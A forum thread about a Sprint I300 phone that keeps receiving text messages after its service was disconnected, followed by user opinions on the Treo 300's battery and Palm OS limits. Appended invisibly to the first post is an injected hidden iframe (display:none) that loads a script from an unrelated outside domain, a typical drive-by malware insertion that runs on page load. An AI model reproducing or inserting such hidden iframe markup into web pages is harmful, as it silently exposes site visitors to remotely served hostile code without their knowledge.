+ Reply to Thread

Phone Service Disconnected But Still Receive Text Messages

I recently purchased the Treo 300 and had the service on my I300 disconnected. But when someone sends me a text message, it comes through on BOTH the Treo and the I300! How can this be? I'm selling the I300 soon and don't want it's new owner receiving my messages. Suggestions anyone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

its on sprints side. nothing you can do but contact them asap and have them make sure the i300's esn is not in your name. (which it seems it still is)...

Gadget Lover
    once the phone is reprogrammed with a different number or the programming is reset... it will stop

Originally posted by akadan217
    once the phone is reprogrammed with a different number or the programming is reset... it will stop
    That's great news as I've had no luck trying to get through to Sprint. Several times, I've been on hold too long and had to hang up. I emailed them and was then told I must call and speak to a tech. So if what you said above is true, maybe I'll just sit tight. Thanks for the replies.

More importantly, what are your thoughts on the Treo 300?

I think I want it, except for the non-removeable battery. I'm in the field way to much for that (3000 minutes a month, and almost all that is daytime use).

Let us know!

David

Originally posted by dgilman
    More importantly, what are your thoughts on the Treo 300?

I think I want it, except for the non-removeable battery. I'm in the field way to much for that (3000 minutes a month, and almost all that is daytime use).

Let us know!

David
    I like the Treo although the built-in battery is a definite negative for someone using it as much as you. Another negative is it operating on the Palm 3.5 system. Many of the PQAs you are probably using currently will not function on the Treo. Specifically, I'm talking about the PQAs that work off the internet. Most of the non-web related PQAs seem to work fine. Of course, this topic is discussed extensively at "Treo Central" and perhaps you would have better luck than me. Otherwise, I'm quite impressed with the Treo. If you have any other questions, feel free to ask.